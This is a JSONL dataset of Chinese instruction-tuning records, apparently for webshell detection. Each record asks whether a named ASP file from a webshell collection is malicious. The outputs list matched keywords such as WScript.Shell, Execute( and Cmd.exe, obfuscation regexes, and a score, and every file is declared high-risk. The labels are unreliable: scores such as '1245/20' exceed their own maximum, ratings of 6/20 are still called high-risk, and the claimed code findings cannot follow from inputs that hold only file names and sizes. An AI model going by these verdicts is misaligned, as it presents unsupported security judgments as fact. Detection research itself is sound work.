检测到恶意函数: Eval(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/bypass-iisuser-p.asp", "malicious_score": 8, "md5_hash": "924d294400a64fa888a79316fb3ccd90"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"海阳顶端网ASP木马@2006PLUS - By Marcos.asp\", \"文件类型\": \"asp\", \"文件大小\": \"44876 bytes\", \"行数\": 1429}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, Request.QueryString, CreateObject( 发现混淆技术: pack\\s*\\(, chr\\s*\\( 恶意度评分: 145/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/海阳顶端网ASP木马@2006PLUS - By Marcos.asp", "malicious_score": 145, "md5_hash": "96cb40e0a101d9818314186a8e53c862"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3fexe Shell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"56301 bytes\", \"行数\": 1102}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Request.QueryString, Response.write, CreateObject(, Createobject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 1245/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/3fexe Shell.asp", "malicious_score": 1245, "md5_hash": "14224d77f803c5dfc8454ff1b4f5893e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"修改属性.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2028 bytes\", \"行数\": 64}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.Form, Response.WRItE, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/修改属性.asp", "malicious_score": 30, "md5_hash": "8b97ed3d0b11700f5fc519603b4c38b2"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"星外-华众-新网-虚拟主机提权专用Webshell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"90164 bytes\", \"行数\": 1296}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 771/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/星外-华众-新网-虚拟主机提权专用Webshell.asp", "malicious_score": 771, "md5_hash": "af2dcc52e2c145fe8ee9aa035547dc24"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"asp wget drag database.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2165 bytes\", \"行数\": 43}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Createobject(, Response.Write, CreateObject( 包含网络功能: wget 恶意度评分: 22/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/asp wget drag database.asp", "malicious_score": 22, "md5_hash": "c858478eb386a0d63eb22818dc9b9e71"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"红狼ASP木马--Anfly免杀版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"3266 bytes\", \"行数\": 80}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: execute(, response.write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 32/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/红狼ASP木马--Anfly免杀版.asp", "malicious_score": 32, "md5_hash": "5fde73dbba8314562c8901dd0cc200f8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"银河舰队大马_2014版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"91388 bytes\", \"行数\": 1189}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CReATEoBJEcT( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/银河舰队大马_2014版.asp", "malicious_score": 191, "md5_hash": "39357c86bfee9d90942912193be5e40b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"download 下载文件.asp\", \"文件类型\": \"asp\", \"文件大小\": \"305 bytes\", \"行数\": 11}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createObject( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/download 下载文件.asp", "malicious_score": 6, "md5_hash": "c92644095f12686d87b93d3d0e21d28c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"60136 bytes\", \"行数\": 1483}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: WScript.Shell, execute(, Request.QueryString, CreateObject(, Request.Form 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: mkdir\\s*\\(, unlink\\s*\\( 恶意度评分: 274/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/devilzShell.asp", "malicious_score": 274, "md5_hash": "e04549b7e57e5048465c6d3a36bec903"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"小强asp木马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"138231 bytes\", \"行数\": 513}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 270/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/小强asp木马.asp", "malicious_score": 270, "md5_hash": "109b14515582a6f99491759bddfa8e74"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"目录扫描读写马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"12831 bytes\", \"行数\": 186}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 101/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/目录扫描读写马.asp", "malicious_score": 101, "md5_hash": "4b59e04fa7c0cfae7355ec2c17c3ea8c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"很好用的扫可读可写目录asp脚本xwdir.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2530 bytes\", \"行数\": 99}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, response.write 恶意度评分: 33/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/很好用的扫可读可写目录asp脚本xwdir.asp", "malicious_score": 33, "md5_hash": "ef476798a81b1712b5ae798fc15af21e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"火狐NEW WebShell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"84618 bytes\", \"行数\": 1454}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Eval(, createobject(, Execute(, request.QueryString, wscript.shell 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/火狐NEW WebShell.asp", "malicious_score": 279, "md5_hash": "5c13f23c09557e709e9b57e28a98032c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"土司搞基asp大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"64597 bytes\", \"行数\": 623}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/土司搞基asp大马.asp", "malicious_score": 195, "md5_hash": "5ab8e34f485ed27be8ac21bb0ecb30b6"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"不灭之魂2013改进版本.asp\", \"文件类型\": \"asp\", \"文件大小\": \"101722 bytes\", \"行数\": 1373}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, CreateObject(, Createobject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 330/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/不灭之魂2013改进版本.asp", "malicious_score": 330, "md5_hash": "8a1bc8557f10c33587b4583a74af103e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PcAnywhere提权 Bin版本.asp\", \"文件类型\": \"asp\", \"文件大小\": \"91690 bytes\", \"行数\": 1266}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/PcAnywhere提权 Bin版本.asp", "malicious_score": 176, "md5_hash": "13ac4146e4a34e3cb984951ac4ab7701"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"KOA ASP类 WebShell扫描工具.asp\", \"文件类型\": \"asp\", \"文件大小\": \"25121 bytes\", \"行数\": 615}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Server.execute, wscript.shell, execute(, Request.QueryString 发现混淆技术: chr\\s*\\( 恶意度评分: 107/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/KOA ASP类 WebShell扫描工具.asp", "malicious_score": 107, "md5_hash": "158b4edb2680db938a4dff73dc24a751"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"传说中的hcker.asp\", \"文件类型\": \"asp\", \"文件大小\": \"92115 bytes\", \"行数\": 1285}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, response.Write, wscript.shell, execute( 发现混淆技术: chr\\s*\\( 恶意度评分: 182/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/传说中的hcker.asp", "malicious_score": 182, "md5_hash": "40c1376cd8a1ce96cb966aea15376f65"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"forever5pi.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63639 bytes\", \"行数\": 2324}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Wscript.Shell, CreateObject(, Request.form, request.form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 489/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/forever5pi.asp", "malicious_score": 489, "md5_hash": "b32d1730d23a660fd6aa8e60c3dc549f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"传说中的草泥马4.0.asp\", \"文件类型\": \"asp\", \"文件大小\": \"94327 bytes\", \"行数\": 1234}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/传说中的草泥马4.0.asp", "malicious_score": 191, "md5_hash": "febbb4648de1845029443e1c6c6154c0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.cer\", \"文件类型\": \"asp\", \"文件大小\": \"1372 bytes\", \"行数\": 79}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/list.cer", "malicious_score": 30, "md5_hash": "1cfa493a165eb4b43e6d4cc0f2eab575"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ZehirIV.asp\", \"文件类型\": \"asp\", \"文件大小\": \"45897 bytes\", \"行数\": 1194}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Response.write, CreateObject(, CreateObject ( 发现混淆技术: chr\\s*\\( 恶意度评分: 455/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/ZehirIV.asp", "malicious_score": 455, "md5_hash": "2fa6fcc8fa83c8b1c5f45c97431c1d07"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"08小组内部交流专用.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1862 bytes\", \"行数\": 57}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/08小组内部交流专用.asp", "malicious_score": 6, "md5_hash": "feb80f2e493cb62d85ed1ec2d6967715"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"目录扫描.asp\", \"文件类型\": \"asp\", \"文件大小\": \"12831 bytes\", \"行数\": 186}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 101/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/目录扫描.asp", "malicious_score": 101, "md5_hash": "4b59e04fa7c0cfae7355ec2c17c3ea8c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Expdoor.com ASP专用小马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1428 bytes\", \"行数\": 37}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.write, CreateObject( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/Expdoor.com ASP专用小马.asp", "malicious_score": 6, "md5_hash": "caef01bb8906d909f24d1fa109ea18a7"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Welcome To AK Team.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1022 bytes\", \"行数\": 43}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.form, response.write, CreateObject( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/Welcome To AK Team.asp", "malicious_score": 15, "md5_hash": "1ef06966028c34c6ab2d88ddae1850d5"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"草莓webshell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"133736 bytes\", \"行数\": 10}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, ExeCuTe(, CreateObject( 恶意度评分: 114/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/草莓webshell.asp", "malicious_score": 114, "md5_hash": "0e3bc5a6ba4680b1c64a2bb2e34c00bd"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Remote Explorer.asp\", \"文件类型\": \"asp\", \"文件大小\": \"7695 bytes\", \"行数\": 250}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, CreateObject( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/Remote Explorer.asp", "malicious_score": 54, "md5_hash": "851175ba9247b8f95050394abf166763"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"by EJDER.asp\", \"文件类型\": \"asp\", \"文件大小\": \"151575 bytes\", \"行数\": 2967}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, response.Write, wscript.shell, request.querystring, Response.write 发现混淆技术: chr\\s*\\( 恶意度评分: 1190/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/by EJDER.asp", "malicious_score": 1190, "md5_hash": "7eb85243f45faa5c6956c75c77d05d91"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ELMALISEKER Backd00r.asp\", \"文件类型\": \"asp\", \"文件大小\": \"38479 bytes\", \"行数\": 1004}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/ELMALISEKER Backd00r.asp", "malicious_score": 776, "md5_hash": "c7fda2d9b971f88df34085c8019df08f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r00ts小组过防火墙马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"116827 bytes\", \"行数\": 2294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, eval(, Request.Form, request.form, response.write 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 885/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/r00ts小组过防火墙马.asp", "malicious_score": 885, "md5_hash": "dda2258df6411e360b67fc920bc763d6"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"在线数据库管理工具 1.5.asp\", \"文件类型\": \"asp\", \"文件大小\": \"46663 bytes\", \"行数\": 1300}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, execute (, execute( 发现混淆技术: chr\\s*\\( 恶意度评分: 83/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/在线数据库管理工具 1.5.asp", "malicious_score": 83, "md5_hash": "5893219aebfb40e2331929f31976248e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NTDaddy v1.9.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41788 bytes\", \"行数\": 1013}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/NTDaddy v1.9.asp", "malicious_score": 776, "md5_hash": "3c0e713347e5a86134f7349aa50234d9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Elmali Seker.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63639 bytes\", \"行数\": 2324}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Wscript.Shell, CreateObject(, Request.form, request.form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 489/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/Elmali Seker.asp", "malicious_score": 489, "md5_hash": "b32d1730d23a660fd6aa8e60c3dc549f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"不灭之魂.asp\", \"文件类型\": \"asp\", \"文件大小\": \"98533 bytes\", \"行数\": 1355}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, Cmd.exe, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 336/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/不灭之魂.asp", "malicious_score": 336, "md5_hash": "3bea9c85adf09796f5a72aa3c55fea2e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"UnKnown 高级Vip防删收费版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"128660 bytes\", \"行数\": 1746}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.form, Request.Form, response.write, Execute(, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 927/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/UnKnown 高级Vip防删收费版.asp", "malicious_score": 927, "md5_hash": "f4a303c8a56f5d09b575d5ebe6f56f3c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Aventis KlasVayv 1.0.asp\", \"文件类型\": \"asp\", \"文件大小\": \"34631 bytes\", \"行数\": 901}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Request.querystring, request.querystring, CreateObject(, response.write 恶意度评分: 123/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/Aventis KlasVayv 1.0.asp", "malicious_score": 123, "md5_hash": "bb2b84369092c377222938d273c3af3b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xynu-Normal University.asp\", \"文件类型\": \"asp\", \"文件大小\": \"14640 bytes\", \"行数\": 294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form, CreateObject( 恶意度评分: 84/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/xynu-Normal University.asp", "malicious_score": 84, "md5_hash": "97da83c6e3efbba98df270cc70beb8f8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hkmjj.asp\", \"文件类型\": \"asp\", \"文件大小\": \"653 bytes\", \"行数\": 22}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.write, execute ( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/hkmjj.asp", "malicious_score": 8, "md5_hash": "8fadd9f56866840fb750d1e9acb5ee14"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"File upload.asp\", \"文件类型\": \"asp\", \"文件大小\": \"4467 bytes\", \"行数\": 137}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/File upload.asp", "malicious_score": 14, "md5_hash": "f775e721cfe85019fe41c34f47c0d67c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASP Cmd Shell On IIS 5.1.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1200 bytes\", \"行数\": 41}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, response.write, Request.Form, WSCRIPT.SHELL, Response.Write 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/ASP Cmd Shell On IIS 5.1.asp", "malicious_score": 30, "md5_hash": "8baa99666bf3734cbdfdd10088e0cd9f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"MSSQL控制程序.asp\", \"文件类型\": \"asp\", \"文件大小\": \"69282 bytes\", \"行数\": 1666}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, execute(, Request.QueryString, Response.write 发现混淆技术: chr\\s*\\( 恶意度评分: 551/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/MSSQL控制程序.asp", "malicious_score": 551, "md5_hash": "5e9e87d774194f2e3efaf4b87b07b37e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mssql.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2046 bytes\", \"行数\": 89}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/mssql.asp", "malicious_score": 11, "md5_hash": "2943d7afad223d0c380809be560b2be5"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mysql.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"41403 bytes\", \"行数\": 1053}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form 恶意度评分: 126/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/脱裤脚本/mysql.aspx", "malicious_score": 126, "md5_hash": "1389c733e6e748ed581a1350ffc05b8c"}} 